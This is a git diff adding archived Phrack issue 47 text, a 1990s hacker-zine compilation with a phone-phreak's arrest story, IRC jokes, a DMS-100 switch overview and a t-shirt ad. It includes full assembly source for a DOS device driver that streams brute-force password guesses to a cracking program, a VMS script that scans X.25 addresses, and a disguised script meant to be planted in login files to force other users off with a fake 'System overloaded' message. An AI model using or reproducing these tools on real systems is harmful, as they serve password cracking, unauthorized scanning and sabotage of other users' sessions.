+     description of everything to getting caught to arraignment.
+
+        Well about 5 months ago i needed to set up a conference really quick..
+     it was about 12:00  (never knew there was a 10:00 pm curfew in that area)
+     and went to a 25 pair box at this local strip mall.  Well I was out there
+     the box was already open and I was just about to start testing pairs to
+     see which was connected and what wasn't.
+
+        All of a sudden, i hear this loud screeching sound of a car coming
+     to a skid from doing about 90mph.  I turned and saw that typically dirty
+     squad car about to hit me.. you know the car, mud and dust on the tires
+     and body, coffee and smudge marks all over the windshield.  i got on my
+     bike and started to run.  Now the thing is I COULD have gotten away.. the
+     pathetic excuse for a cop had run not more than 10 yards after me and
+     decided that I was a threat so he pulled his handgun and yelled.  I saw
+     this and thought it would be wiser to stop than get shot.
+
+        Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
+     not know i was less than a half mile from a police station and they were
+     looking for a prowler in the general area.  The police did the normal,
+     called me scum, asked me what i was doing, searched me until they were
+     satisfied...  than picked me up and threw me in the car... the funny
+     thing was they didn't see my phone until they threw me into the back seat
+     and the cord fell out.. (they never saw the page of notes and 'naughty'
+     material in my pocket though it was about 4 inches thick and sticking out
+     that a blind man could see it.
+
+        Well they got me to the station and pried my info out, and called my
+     father... I came up with a good enough story about some made up user
+     who told me to go across the street and plug in..  then I was told I
+     would be dealt with in the next week...  I did not receive anything for
+     three and a half months.
+
+        Once the time came for the arraignment (for a juvenile they called it
+     an intake).  I got to go to the police station, sit for about 3 hours (as
+     if i thought they would be on time) until I waited for my probation
+     officer. Finally she got there and we proceeded to talk.  She explained
+     all of the charges and my lawyer (interesting guy) laughed, I was being
+     charged with prowling (could be disputed I was on a public sidewalk and
+     there in that strip mall is a 24 hr laundry mat), loitering (again that
+     could be disputed), and attempted theft of services (though I NEVER even
+     plugged in).
+
+        After this was all said i spent the next hour talking with the lady
+     in private.  I immediately found she had an interest in computers and was
+     having a problem with her home pc.  So I easily changed the topic to my
+     fascination in computers and solved her problem with her computer, and
+     answered at least 50 questions about them.  In the last 10-15 minutes of
+     the conversation all i could get from her were statements about how
+     impressed and how intrigued she was with me.  She ended up giving me a
+     look (that was hard to judge but i am staying away from this chick) that
+     was either confusion or attraction, slipped me a card with her home phone
+     number and name and called back in my lawyer and parents.
+
+        Once they got back in, all that she really said was I was a great boy,
+     that she would like to see me do more with my time besides computers, and
+     that she was taking my sentence of 12 months formal probation with 300
+     hours of community service to 3 months of informal probation with 30
+     hours of community service.  That and she said bell was asking her what
+     to do and she would tell them that it was a non issue since I did not
+     plug in and even if I had it would not be their concern unless I had
+     plugged in to the telco access part of the network interface.
+
+        Well I have yet to receive official record of having to perform
+     the community service or the probation but I called my probation officer
+     yesterday and said she wasn't putting the community service into the
+     punishment and it has been an equivalent amount of time to just say that
+     since I haven't gotten in trouble since she will count the probation as
+     already served.  Luckily she based all other needs of me on the report
+     from a teacher, and with my luck she picked the one teacher, my computers
+     teacher, that no matter what I did or said would lie and say I didn't.
+
+
+        Thanks to erikb for publishing this, and greets to CXrank, paradox,
+     dark phiber, the fat cop (who spilled his coffee and box of donuts
+     coming after me) that made this all possible,  and to everyone else.
+
+
+                        -rush 2
+            http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html
+
+
+                Look for My site, unforeseen danger soon to be on a 28.8 slip
+            and by the end of the summer on a 500k slip connect.
+
+
+------------------------------------------------------------------------------
+
+[Something found on IRC]
+
+Danny Partridge         Emmanuel Goldstein
+(AKA Danny Bonaduce:    (AKA Eric Corley:
+a child star from       the child-like publisher
+"The Partridge Family"  of 26oo magazine.
+----------------------  ------------------
+
+Hosts a boring local    Hosts a boring local
+radio program.          radio program.
+
+Quasi Celebrity         Quasi Celebrity
+Status among            Status among
+70's freaks             telephone phreaks
+
+Periods of Heavy        Periods of Heavy
+Drug Usage              Drug Usage
+
+Involved in Sex         Involved in Sex
+Scandal with            Scandal with
+another man             another man
+
+Last name is            Friends with Phiber
+"Bonaduce"              Optik whose first
+                        handle was "Il Duce"
+
+Supplements incoming    Supplements incoming
+by doing desperate      by doing desperate
+local talk shows        local talk shows
+whenever he can.        whenever he can.
+
+------------------------------------------------------------------------------
+
+Top 10 #hack fights that would be the coolest to see.
+(And no, Ophie's not in it twice just because she's a girl...)
+===========================================================================
+
+10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling
+featuring KL & TK.
+
+9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the
+one after that... or, uh...
+
+8.) C-Curve and Elite Entity, "Who's who?"
+
+7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere."
+(Or: "I'm totally numb, let me hug you!!!")
+
+6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"
+
+5.) Grayarea vs. Netcom "No, *I* want root..."
+
+4.) WWF Wrestling with Len and |al|.
+
+3.) Ophie vs. Voyager, "Night of the Living Dead."
+
+2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."
+and the number one #hack fight is
+
+1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"
+
+
+------------------------------------------------------------------------------
+
+P A S S W O R D   E N G I N E  (for IBM PC's)                by Uncle Armpit
++++++++++++++++++++++++++++++++++++++++++++++
+
+   The device driver code listed below provides a data stream of passwords.
+The device driver approach was used to speed up the process
+of cracking passwords on an incremental basis. The usual approach was
+to generate the passwords to a file, then reading the file, etc..the device
+driver approach circumvents these file storage problems, and others, such as
+having enough free disk space and delays from disk i/o.
+    This driver operates completely in memory (approx. 0.5Kb)
+
+How practical is this?
+----------------------
+This program would be very useful if you think you may know what strategy
+the user/admin uses for picking out their passwords.  Without eliciting some
+sort of a strategy, forget it-- unless your desperate enough!!
+
+
+A "strategy" could consist of any of these possible advantages--
+
+1) default passwords (ie: SIN, student #, birth date, phone number...)
+2) the mutation of a lUSERs' known password from another system
+3) viewing the mark typing in most of their password with a couple
+   of unseen characters
+4) etc...
+
+---------------------------
+  With the sample device driver provided, passwords starting at
+'aaaaaaa' and ending with 'zzzzzzz' will be generated.  The length
+of the password string can be modified by changing the length of
+the password string itself (that is, the variable "number").  The
+range of characters in the passwords can also be changed by
+modifying the following two lines:
+
+;hackdrv.sys
+;.
+;.
+;
+for ending character--
+cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
+
+...and for starting character
+cmp byte ptr [number+si],'a'   ;starting char. in range
+;
+;----------------------
+
+for instance, if you wished to generate numbers from "0000000" to
+"9999999"
+
+-change the ending character to:
+cmp byte ptr [number+si],'9'+1
+
+-starting character to:
+cmp byte ptr [number+si],'0'
+
+and "number" variable from 'aaaaaa' to '0000000' and then
+recompile..
+
+-----
+
+ ..or in the third case, if u had observed a lUSER type in most of
+their password, you may want to rewrite the code to limit the
+search.  IE: limit the keys to a certain quadrant of the keyboard.
+   Modify the code starting at "reiterate:"  and ending at "inc_num
+endp" for this.
+=================================================================
+
+
+/'nuff of this!/   How do I get things working?
+-----------------------------------------------
+
+Compile the device driver "hackdrv.sys", and the second program,
+"modpwd.asm". Then specify the device driver inside config.sys
+(ie: "c:\hackdrv.sys").  The code below was compiled with the a86
+compiler, v3.03.  Some modifications might be needed to work with
+other compilers.
+
+To use it in prgs like crackerjack, type in the following on the
+command line:
+
+
+c:\>jack -pwfile:<your password file here!> -word:hackpwd
+
+------
+ If you had stopped a cracker program (eg: crackerjack) and want to
+pick up from where you left off, run the program "modpwd.com".
+
+ This program can change HACKDRVs password through-
+
+ a) a command line argument (ie: "modpwd aabbbbe")
+ b) executing the program with no parameters (this method also
+    displays the current password in memory)
+
+
+
+                                                   Happy Hacking,
+                                                   Uncle Armpit
+
+;-----------------------cut here--------------------------------
+;Program HACKDRV.SYS
+;
+org 0h
+next_dev dd -1
+attribute dw 0c000h            ;character device w/ ioctl calls
+strategy dw dev_strategy
+interrupt dw dev_int
+dev_name db 'HACKPWD '
+countr dw offset number
+number db 'aaaaaa',0ah         ;<----six characters, lower case
+numsize equ $-number - 2
+afternum:
+
+;working space for device driver
+rh_ofs dw ?
+rh_seg dw ?
+
+dev_strategy:               ;strategy routine
+mov cs:rh_seg,es
+mov cs:rh_ofs,bx
+retf
+
+dev_int:                    ;interrupt routine
+pushf
+push ds
+push es
+push ax
+push bx
+push cx
+push dx
+push di
+push si
+
+cld
+push cs
+pop ds
+
+mov bx,cs:rh_seg
+mov es,bx
+mov bx,cs:rh_ofs
+
+mov al,es:[bx]+2
+rol al,1
+mov di,offset cmdtab
+xor ah,ah
+add di,ax
+jmp word ptr[di]
+
+
+cmdtab:            ;command table
+dw init        ;0
+dw exit3       ;1
+dw exit3       ;2
+dw ioctl_read  ;3
+dw do_read     ;4
+dw exit3       ;5
+dw exit3       ;6
+dw exit3       ;7
+dw exit3       ;8
+dw exit3       ;9
+dw exit3       ;10
+dw exit3       ;11
+dw ioctl_write ;12
+dw exit3       ;13
+dw 5 dup (offset exit3)
+
+
+
+ioctl_read:
+push es
+push bx
+
+mov si,es:[bx+10h]
+mov di,es:[bx+0eh]
+mov es,si
+
+push cs
+pop ds
+mov si,offset number
+xor cx,cx
+
+get_char:
+lodsb
+stosb
+inc cl
+cmp al,0ah
+jz ioctl_rend
+jmp get_char
+
+ioctl_rend:
+pop bx
+pop es
+mov es:[bx+012h],cx
+mov cs:countr,offset number
+jmp exit2
+
+ioctl_write:
+push es
+push bx
+mov si,es:[bx+010h]
+mov ds,si
+mov si,es:[bx+0eh]
+mov cx,numsize+1               ;es:[bx+012h]
+push cs
+pop es
+mov di,offset number
+repe movsb
+pop es
+pop bx
+mov cs:countr,offset number
+jmp exit2
+
+
+do_read:
+push es
+push bx
+
+
+push cs
+pop ds
+
+mov si,[countr]
+inc si                      ;word ptr [countr]
+cmp si,offset afternum
+jnz is_okay
+mov si,offset number
+call inc_num
+
+
+is_okay:
+mov [countr],si
+mov di,es:[bx]+0eh
+mov ax,es:[bx]+010h
+mov cx, es:[bx]+012h
+jcxz clean_up
+mov es,ax
+repe movsb
+
+clean_up:
+pop bx
+pop es
+jmp exit2
+
+
+exit3: mov es:word ptr 3[bx],08103h
+jmp exit1
+
+exit2:
+mov es:word ptr 3[bx],0100h
+
+exit1:
+pop si
+pop di
+pop dx
+pop cx
+pop bx
+pop ax
+pop es
+pop ds
+popf
+retf
+exit:
+
+inc_num proc near
+ push si
+ mov si,numsize
+
+ reiterate:
+  inc byte ptr [number+si]
+  cmp byte ptr [number+si],'z'+1    ;+1 past ending char. in range
+  jnz _exit
+  mov byte ptr [number+si],'a'      ;starting char. in range
+  dec si
+  cmp si,-1
+  jnz reiterate
+  mov byte ptr [number],01ah        ;send EOF
+ _exit:
+  pop si
+  ret
+inc_num endp
+
+
+
+at_eof:                        ; the non-resident code starts here
+
+initial proc near
+push es
+
+push cs
+pop ds
+
+push cs
+pop es
+
+mov si,offset number
+mov di,offset tmpnum
+cld
+_again:
+lodsb
+cmp al,0ah
+jz _nomorechars
+stosb
+jmp _again
+
+_nomorechars:
+mov si,offset msgend
+mov cx,4
+repe movsb
+
+mov ah,09             ;print welcome message
+mov dx,offset msg1
+int 21h
+
+pop es
+ret
+initial endp
+
+init: call initial
+mov ax,offset at_eof
+mov es:[bx]+0eh,ax
+push cs
+pop ax
+mov es:[bx]+010h,ax
+mov cs:word ptr cmdtab,offset exit3
+jmp exit2
+
+
+msg1    db "Incremental Password Generator (c)1995",0ah,0dh
+        db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
+        db "Starting at word ["
+tmpnum  db 10 dup (?)
+msgend  db "]",0a,0d,'$'
+;END hackdrv.sys
+
+;------------------------------cut here----------------------------------
+
+;PROGRAM modpwd.asm
+;
+org 0100h
+mov ax,03d02h
+xor cx,cx
+mov dx,offset devname
+int 21h
+jnc drvr_found
+
+mov ah,09
+mov dx,offset no_drvr
+int 21h
+jmp error_pass
+
+
+drvr_found:
+mov bx,ax
+mov ax,04402h
+mov cx,20                   ;read 20 characters
+mov dx,offset databuffr
+int 21h
+
+mov pass_len,al
+dec al
+mov ah,al
+and al,0fh
+mov cl,4
+shr ah,cl
+add ax,03030h
+cmp al,'9'
+jbe inrange
+add al,7
+inrange:
+cmp ah,'9'
+jbe inrange1
+add ah,7
+inrange1:
+mov byte ptr [num_chr],ah
+mov byte ptr [num_chr+1],al
+
+
+cld
+mov di,offset databuffr-1
+xor cx,cx
+mov cl,pass_len
+add di,cx
+mov si,offset pass_end
+mov cx,stringsz
+repe movsb
+
+;check for information in command line
+;else--> prompt for user input
+mov al,pass_len
+or byte ptr [0080h],0
+jz req_input
+mov cl,[0080h]
+dec cl
+mov [0081h],cl
+mov si,0081h
+mov di,offset newpass
+mov cx,20
+repe movsb
+jmp vrfy_info
+
+req_input:
+mov ah,09
+mov dx,offset cur_pass
+int 21h
+
+mov ah,0a
+mov dx,offset pass_len
+int 21h
+
+
+vrfy_info:
+mov ax,word ptr [pass_len]
+cmp ah,0
+jz error_pass
+dec al
+cmp ah,al
+jnz error_len
+
+;change the current password
+xor cx,cx
+mov cl,al
+mov ah,044h
+mov al,03
+mov dx,offset newpass+1
+int 21h
+jnc success_pass
+
+error_len:
+mov ah,09
+mov dx,offset errormsg
+int 21h
+
+error_pass:
+mov ax,04c01h                     ;abnormal termination
+int 21h
+
+success_pass:
+mov ax,04c00h
+int 21h
+
+
+devhandle  dw ?
+cur_pass   db 'Current password is ['
+databuffr  db 20 dup (?)
+pass_end   db ']      ;'
+num_chr    db '  '
+           db ' characters',0ah,0dh,0ah,0dh
+prompt     db 'New word: ','$'
+stringsz  equ $ - pass_end
+
+pass_len   db 00
+newpass    db 20 dup (?)
+errormsg   db 'error changing password!',0ah,0dh,'$'
+no_drvr    db 'Error: '
+devname    db "HACKPWD ",00
+           db 'device driver not loaded!',0ah,0dh,07,'$'
+
+
+------------------------------------------------------------------------------
+
+         -- Frequently & Rarely asked questions about VMS -- part one
+        by Opticon the Disassembled - UPi
+
+[1]
+
+ " I have a kropotkin.hlp file. What could I possibly do with it ? "
+
+$ library /insert /help sys$help:helplib.hlb kropotkin.hlp
+.
+.
+.
+$ help kropotkin
+
+[2]
+
+ " I have a bakunin.tlb file. What to do with it ? "
+
+$ library /extract=(*) bakunin.tlb
+.
+.
+.
+$ dir
+
+[3]
+
+ " I would like to have a look at prunton.dat. "
+
+$ dump [/block=(count:x)] prunton.dat
+
+Where "x" is the number of blocks DUMP will display.
+
+[4]
+
+ " How can I use an external editor with mail ? "
+
+$ mail :== mail /edit=(send,reply=extract,forward)
+
+[5]
+
+ " How a HELP file is organized ? "
+
+$ create example.hlp
+1 EXAMPLE
+
+  THIS IS AN EXAMPLE.
+
+2 MORE_EXAMPLES
+
+  MORE EXAMPLES.
+
+3 EVEN_MORE_EXAMPLES
+
+  EVEN MORE EXAMPLES.
+<CTRL-Z>
+
+[6]
+
+ " How can I have a look at queues ? "
+
+$ show queue smtp /all/full
+
+or
+
+$ show queue /batch/all/full
+
+or
+
+$ show queue /all/full
+
+[7]
+
+ " My mail is holded, for some reason, in the SMTP queue... "
+
+Either
+
+$ delete /entry=XXX
+
+or
+
+$ set entry XXX /release
+
+in order to force VMS to release it right away.
+
+[8]
+
+ " How do I have a look at DTE and circuits available. "
+
+$ mc ncp show known dte
+
+and
+
+$ mc ncp show known circuits
+
+You may also may find of interest:
+
+$ mc ncp show known networks
+
+$ mc ncp show known lines
+
+$ mc ncp show known destinations
+
+[9]
+
+ " I need a NUA scanner for VMS. "
+
+$ OPEN/READ VALUES SCAN.VAL
+$ READ VALUES PRE
+$ READ VALUES DTE
+$ READ VALUES END
+$ CLOSE VALUES
+$ LOG = "SCAN.LIS"
+$ TMP = "SCAN.TMP"
+$ OPEN/WRITE FILE 'LOG
+$ WRITE FILE "PREFIX:",PRE
+$ WRITE FILE "START :",DTE
+$ WRITE FILE "LAST  :",END
+$LOOP:
+$ ON ERROR THEN GOTO OPEN
+$ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE'
+$ WAIT 00:00:06
+$ SPAWN_NAME = F$GETJPI("","USERNAME")
+$ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_"
+$ CONTEXT = ""
+$FIND_PROC:
+$ PID = F$PID(CONTEXT)
+$ IF PID .EQS. "" THEN GOTO OPEN
+$ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID
+$ GOTO FIND_PROC
+$OPEN:
+$ ON ERROR THEN GOTO OPEN
+$ OPEN/READ PAD 'TMP
+$ MSSG = " Process stopped"
+$ ON ERROR THEN GOTO CLOSE
+$ READ PAD LINE
+$ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE
+$ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE)
+$CLOSE:
+$ CLOSE PAD
+$ DELETE 'TMP';*
+$ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN
+$ WRITE FILE PRE,DTE,MSSG
+$NOCONN:
+$ DTE = DTE + 1
+$ IF DTE .LE. END THEN GOTO LOOP
+$ CLOSE FILE
+
+( I don't have a clue by whom the code was written. )
+
+then
+
+$ create scan.val
+prefix
+starting_NUA
+ending_NUA
+<CTRL-Z>
+$ submit /noprint scan.com
+.
+.
+.
+$ search scan.lis "call connected"
+
+[10]
+
+ " How do I crash a VAX !? "
+
+$ set default sys$system
+$ @shutdown
+
+or
+
+$ set default sys$system
+$ run opccrash
+
+[11]
+
+ " I have a dostogiefski.cld file; what do I do with it ? "
+
+$ set command dostogiefski.cld
+
+[12]
+
+ " Can I send messages to interactive processes ? "
+
+$ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "
+
+[13]
+
+ " How can I prevent someone from phoning me all the time ? "
+
+$ set broadcast=(nophone)
+
+[14]
+
+ " Can I postpone/disable interactive logins ? "
+
+$ set logins /interactive=0
+
+$ set logins /interactive
+
+will display current value.
+
+Under the same `logic' :
+
+$ create innocent_filename.com
+$ set nocontrol
+$ context = ""
+$ pid = F$PID(context)
+$ user_name = F$GETJPI(pid,"username")
+$ wait 00:01:00.00
+$ write sys$output ""
+$ write sys$output " System overloaded; please try again later "
+$ write sys$output " Logging out process ''pid', of user ''user_name' "
+$ write sys$output ""
+$ logout /full
+
+Add either to sys$system:sylogin.com or sys$login:login.com the following:
+" $ @innocent_filename.com ".
+
+[15]
+
+ " How can I modify the welcome file ? Where is it held ? "
+
+$ set default sys$system
+$ edit welcome.txt
+
+[16]
+
+ " I am editing a huge text file. How can I reach the end of it ? "
+
+at the editor's prompt type:
+
+*find end
+
+or
+
+*find "search string"
+
+[17]
+
+   " How can I be sure than noone is watching me from a hidden process ? "
+
+$ show system /process
+VAX/VMS V5.5-2  on node STIRNER  30-MAR-1937 02:10:41.94   Uptime  2 03:05:25
+  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
+.
+.
+.
+00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47
+00000117 SMTP_SYMBIONT   HIB      4    33398   0 00:16:49.67    246104    426
+00000118 SYMBIONT_6      HIB      4    47868   0 00:05:09.01       296    121
+00001255 SYMBIONT_0001   CUR 13  15    64293   0 00:05:08.12      1982    248
+
+$ show system /full
+
+VAX/VMS V5.5-2  on node STIRNER  30-MAR-1937 02:10:59.64   Uptime  2 03:05:43
+  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
+.
+.
+.
+00000114 SYMBIONT_4      HIB      5      290   0 00:00:19.05      1650     47
+         [1,4]
+00000117 SMTP_SYMBIONT   LEF      5    33407   0 00:16:49.78    246116    502
+         [1,4]
+00000118 SYMBIONT_6      HIB      5    47872   0 00:05:09.03       296    121
+         [1,4]
+00001255 SYMBIONT_0001   CUR 13  15    64348   0 00:05:09.60      2063    268
+         [1,4]
+$
+
+ See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4,
+ SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program
+ ( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but
+ state, priority, physical memory used, page faults, input/output and Process
+ IDentification numbers, can reveal, in combination, such a nastyness.
+
+ Afterwards you may " show process /id=xxxx /continuous ",
+ or " stop /id=xxxx ".
+
+[18]
+
+   " Can I view the CPU usage of each process ? "
+
+$ monitor processes /topcpu
+
+will display a bar-chart of this kind.
+
+[19]
+
+   Run the following .COM file and it will display information you'd
+ possibly need on an account and/or node. It uses simple lexical functions.
+
+$ output :== write sys$output
+$ output ""
+$ node_id = F$CSID(context)
+$ nodename = F$GETSYI("nodename",,node_id)
+$ if F$GETSYI("cluster_member") .EQS. "TRUE"
+$ then output " ''nodename' is a member of a cluster. "
+$ else output " ''nodename' is not a member of a cluster. "
+$ context = ""
+$ username = F$GETJPI("","username")
+$ output " Username : ''username' "
+$ group = F$GETJPI("","grp")
+$ output " Group : ''group' "
+$ uic = F$USER()
+$ output " User Identification Code : ''uic' "
+$ pid = F$PID(context)
+$ output " Process IDentification : ''pid' "
+$ process = F$PROCESS()
+$ output " Process Name : ''process' "
+$ terminal = F$GETJPI("","terminal")
+$ output " Terminal Name : ''terminal' "
+$ priority = F$GETJPI("","authpri")
+$ output " Authorized Priority : ''priority' "
+$ maxjobs = F$GETJPI("","maxjobs")
+$ output " Maximum Number of Processes Allowed : ''maxjobs' "
+$ authpriv = F$GETJPI("","authpriv")
+$ output " Authorized Privileges : ''authpriv' "
+$ curpriv = F$GETJPI("","curpriv")
+$ output " Current Privileges : ''curpriv' "
+$ directory = F$DIRECTORY()
+$ output " Directory : ''directory' "
+$ protection = F$ENVIRONMENT("protection")
+$ output " Protection : ''protection' "
+$ boottime = F$GETSYI("boottime")
+$ output " Boot Time : ''boottime' "
+$ time = F$TIME()
+$ output " Current Time : ''time' "
+$ version = F$GETSYI("version")
+$ output " VMS version : ''version' "
+$ output ""
+
+ You may :
+
+$ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb
+
+and then transfer lexicals.hlp.
+
+[20]
+
+    " How can I view/modify my disk quota limit ? "
+
+ DiskQuota was a standalone utility in versions prior to five; It is now
+ a subset of the System Management utility, and thus you should :
+
+$ set def sys$system
+$ run sysman
+SYSMAN> diskquota show /device=dua1: [1,1]
+%SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --
+Node
+     UIC                  Usage        Permanent Quota   Overdraft Limit
+[1,1]                     123456       1500000           100
+
+SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000
+
+[END]
+
+   Post Scriptum
+
+   Some operations require privileges.
+
+
+------------------------------------------------------------------------------
+
+Compaq CEO blunders on TV
+
+          Compaq CEO Eckard Pfeiffer last week visited The Netherlands
+          to do some pr work. During a television interview for NOVA,
+          a well known news show that aired last Friday, Pfeiffer
+          claimed that pc's were easy to use, and could be used by
+          virtually anyone. So, the reporter asked him to switch the
+          tv channel on a Presario that was next to Pfeiffer that ran
+          a Windows-based TV tuner. The result was Pfeifer frantically
+          clicking on several menu bars, but instead of switching
+          channels, he exited the program altogether. To make things
+          worse, the reporter next asked him to start up a word
+          processor.  Again, Pfeiffer, clicked his way around the
+          desktop, but couldn't find nor start the program. Finally,
+          he was asked to start up a game. You saw Pfeifer (now in
+          deep trouble) clicking on all the tabs of the "easy to use"
+          tab-works interface that is included on all Presario's,
+          looking for games, while muttering "Were are ze games? I
+          can't find ze games on zis machine!!!", his accent becoming
+          increasingly more German then before. It was almost like Dr.
+          Strangelove. The last shot is of a Compaq tech support guy,
+          rushing in to help him out....  So much for ease of use....
+
+Voorburgwal 129, 1012 EP
+Amsterdam, The Netherlands).
+
+------------------------------------------------------------------------------
+
+Ok, I'm going to assume that you already know a little bit about what it
+is you're reading.  The DMS100/IBN (integrated business network) is
+composed of mainly electronic business sets, phones, data units, and
+attendant consoles and units, all physically at the customers place of
+business.  While the digital switching software and support hardware is
+located at the Telco.  Together, in tandem they work to give the customer
+one of the best combinations of features and benefits.  The DMS-100
+combines voice AND data in one business comunications package.  One of
+the many advantages is it offers the use with *any* sized business with
+up to 30,000 lines.  The IBN system controls most operations, diagnoses
+problems, and also has the ability to do limited repairs on itself.
+Being modular, it can meet the needs at hand, and have the ability for
+new features, as time goes by, while still maintaining a cost-effective
+environment.  Another advantage is that is uses a central attendant where
+and when needed.  Along with Call Routing, or CDR, to control and
+restrict Long Distnace Calling, and network management.  The IBN gives
+the user hassle free operation.  Northern Telcom's DMS-100 switches,
+which by the way are digital, are frequently backed-up by their
+*higher trained* personnel, which isnt saying much.  Some other features
+are: Automatic Routing Selection, or ARS, which routes the long distance
+calls, if they are even allowed, over the most economical (right) route
+available.  Station Message Detail Recording, or SMDR, which basically
+does just what its name states, records long distance charges, including
+but not limited to, originating number, time and length of call,
+authorization code, and others...  Yet another capability is the Direct
+Inward System Access (DISA), which gives the personnel the ability to use
+the system to place long distance calls cheaply, even from outside the
+company (sounds like a PBX a bit doesn't it?).
+System Features and Benefits:  There are 6 Call Waiting Lamp Loop Keys,
+each with its associated source AND destination lamp to signify the
+status of both the calling and the called party status.  The Second
+feature is Alpha Numeric Display Multiple Directory Number Feature Keys,
+up to 42 of them, which can be used for a Paging System, or speed
+dialing, and things along those lines.  A third feature is the release
+Source/Release Destination Console, which features access to paging.
+Other features which mainly are unimportant I will list here, they are:
+Call Identifier Exclude Source/Exclude Destination.  Remote Console Call
+Destination.  Signal Source.Signal Destination.  Call Holding.  Call
+Detail Entry.  Remote Console Call Selection.  Console Display.  Camp-on
+Automatic Recall Conference.  A 6 port 2 way splitting non-delayed
+operation.  Busy Verification of Lines.  Manual and Automatic Hold.
+Multiple Console OPeration.  Busy verification of trunks. Switched Loop
+Operation.  Trunk Group Busy Indication.  Uniform Call distribution form
+queue.  Multiple listed directory numbers.  Control of trunk group
+access.  Secrecy.  Night Service.  Serial call.  Speed Calling.  Lockout.
+ Delayed Operation.  Position Busy.  Interposition Calling.  THrough Call
+Pickup.  RIng Again.  Multiple Directory Numbers.  Intercom.  Speed
+Call.  Call Transfer/Conference.  On-Hook Dialing.  Additional
+Programmable Features include automatic hold.  Listem-on hold.  Multiple
+Appearance Directory Numbers, or MADN.  Single Call Arrangement.
+Multiple Call Arrangement.  Privacy Release.  Tone Ringing with Volume
+Control.  Call Waiting.  Stored Number Redial.  Private Business Line.
+And Finally a 32 character alphanumeric data unit.  The DMS100/IBN can be
+used as a "standalone" or can be attached to the business set or other
+phone type unit.  It has the ability to transmit over a two wire loop, at
+speeds of up to 56 kb per second, using a proprietary time compression
+multiplexing technology.  The DMS100 is also available in different
+models to suit existing terminal capacities.  It also provides integrated
+voice/data, that right data, communications.  They, the phone company,
+and data unit, can operate together, simultaniously, or even independant
+of one another.  Being fully digitized, it was one if the first switches
+to eliminate the use of those dinosaur analog modems (for which i still
+have a few if anyone wants to buy em off me or give me shipping money and
+ill send em to ya free).  Well thats it for now.  This should give you a
+good understanding of the capabilities of one of the many switches in use
+today.  In fact, although outdated somewhat, my telco, citizens
+utilities, and one in stockton from what i just found out, is still using
+this switch (poor me in elk grove, ca eh?)
+which makes phreaking quite an easy task, not that it was really ever
+hard but anything to make it easier help.  ANyway, if you have any
+comments/flames/general bullshit, mail it to either
+jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a
+last resort email address.
+ciao
+                                             ---Captain Hook
+
+------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/phrack47/4.txt b/phrack47/4.txt
new file mode 100644
index 0000000..9eaff94
--- /dev/null
+++ b/phrack47/4.txt
@@ -0,0 +1,2038 @@
+                         ==Phrack Magazine==
+
+              Volume Six, Issue Forty-Seven, File 4 of 22
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                 PART II
+
+------------------------------------------------------------------------------
+
+The official Legion of Doom t-shirts are stll available!!!
+Join the net luminaries world-wide in owning one of these amazing
+shirts.  Impress members of the opposite sex, increase your IQ,
+annoy system administrators, get raided by the government and
+lose your wardrobe!
+ 
+Can a t-shirt really do all this?  Of course it can!
+ 
+--------------------------------------------------------------------------
+ 
+"THE HACKER WAR  --  LOD vs MOD"
+ 
+This t-shirt chronicles the infamous "Hacker War" between rival
+groups The Legion of Doom and  The Masters of Destruction.  The front
+of the shirt displays a flight map of the various battle-sites
+hit by MOD and tracked by LOD.  The back of the shirt
+has a detailed timeline of the key dates in the conflict, and
+a rather ironic quote from an MOD member.
+ 
+(For a limited time, the original is back!)
+ 
+"LEGION OF DOOM  --  INTERNET WORLD TOUR"
+ 
+The front of this classic shirt displays "Legion of Doom Internet World
+Tour" as well as a sword and telephone intersecting the planet
+earth, skull-and-crossbones style.  The back displays the
+words "Hacking for Jesus" as well as a substantial list of "tour-stops"
+(internet sites) and a quote from Aleister Crowley.
+ 
+--------------------------------------------------------------------------
+ 
+All t-shirts are sized XL, and are 100% cotton.
+ 
+Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for
+postage.
+ 
+Send checks or money orders.  Please, no credit cards, even if
+it's really your card.
+ 
+ 
+Name:       __________________________________________________
+ 
+Address:    __________________________________________________
+ 
+City, State, Zip:   __________________________________________
+ 
+ 
+I want ____ "Hacker War" shirt(s)
+ 
+I want ____ "Internet World Tour" shirt(s)
+ 
+Enclosed is $______ for the total cost.
+ 
+ 
+Mail to:   Chris Goggans
+           603 W. 13th #1A-278
+           Austin, TX 78701
+ 
+ 
+These T-shirts are sold only as a novelty items, and are in no way
+attempting to glorify computer crime.
+
+------------------------------------------------------------------------------
+
+[The editor's Open Letter to Wired Magazine...they actually had the nerve
+ to print it in their May issue.  Amazing...or was it?  The letter was posted
